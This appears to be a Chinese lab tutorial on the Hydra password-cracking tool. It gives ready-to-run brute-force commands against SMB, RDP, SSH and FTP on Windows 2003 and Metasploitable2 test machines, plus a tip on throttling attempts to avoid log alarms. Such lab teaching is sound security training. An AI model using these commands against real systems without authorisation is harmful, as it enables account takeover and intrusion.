赞
踩
linux、Win2003、kali
查看 hydra 帮助信息:
hydra -h
...
支持在线破解的服务协议:
Supported services: adam6500 asterisk cisco cisco-enable cvs
firebird ftp[s] http[s]-{head|get|post} http[s]-{get|post}-form
http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s]
ldap3[-{cram|digest}md5][s] memcached mongodb mssql mysql nntp
oracle-listener oracle-sid pcanywhere pcnfs pop3[s] postgres
radmin2 rdp redis rexec rlogin rpcap rsh rtsp s7-300 sip smb
smtp[s] smtp-enum snmp socks5 ssh sshkey svn teamspeak telnet[s]
vmauthd vnc xmpp
使用示例:
Examples:
hydra -l user -P passlist.txt ftp://192.168.0.1
hydra -L userlist.txt -p defaultpw imap://192.168.0.1/PLAIN
hydra -C defaults.txt -6 pop3s://[2001:db8::1]:143/TLS:DIGEST-MD5
hydra -l admin -p password ftp://[192.168.0.0/24]/
hydra -L logins.txt -P pws.txt -M targets.txt ssh
-l 后面跟着 具体的用户名
-p 后面跟着 具体的密码
-L 后面跟着 用户字典
-P 后面跟着 密码字典
信息发现:
445、139 文件共享服务
3389 远程桌面
(1)Win2003 查看你文件共享
net share
(2)开始破解
hydra -l Administrator -P pass.txt smb://192.168.47.124
爆破 3389 端口
hydra -l Administrator -P pass.txt rdp://192.168.47.124 -V
一般爆破 RDP 最后别选择多进程、多线程:
hydra -l Administrator -P pass.txt rdp://192.168.47.124 -t 1 -V
显然这个工具爆破失败了!!! 前面测试 Administrator 密码为 root
目标机:metasploitable2
hydra -l msfadmin -P pass.txt ssh://192.168.47.133 -vV
端口扫描下:
这次用户和密码都用字典试试:
hydra -L user.txt -P pass.txt ftp://192.168.47.133 -s 2121 -e nsr -t 1 -vV
-s:指定服务端口
-R 根据上一次进度继续破解
-S 使用SSL协议连接
-s 指定端口
-l 指定用户名
-L 指定用户名字典(文件)
-p 指定密码破解
-P 指定密码字典(文件)
-e 空密码探测和指定用户密码探测(ns)
-C 用户名可以用:分割(username:password)可以代替-l username -p password
-o 输出文件
-t 指定多线程数量,默认为16个线程
-vV 显示详细过程
server 目标IP
service 指定服务名(telnet ftp pop3 mssql mysql ssh ssh2......)
日志报警机制: 控制单位时间内单个IP访问次数
所以一般不选择多并发进行爆破!
hydra 同样支持 网页登入口密码爆破,就不介绍了,BP也挺好用的,哈哈!
另外 hydra 也有图形化的界面
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。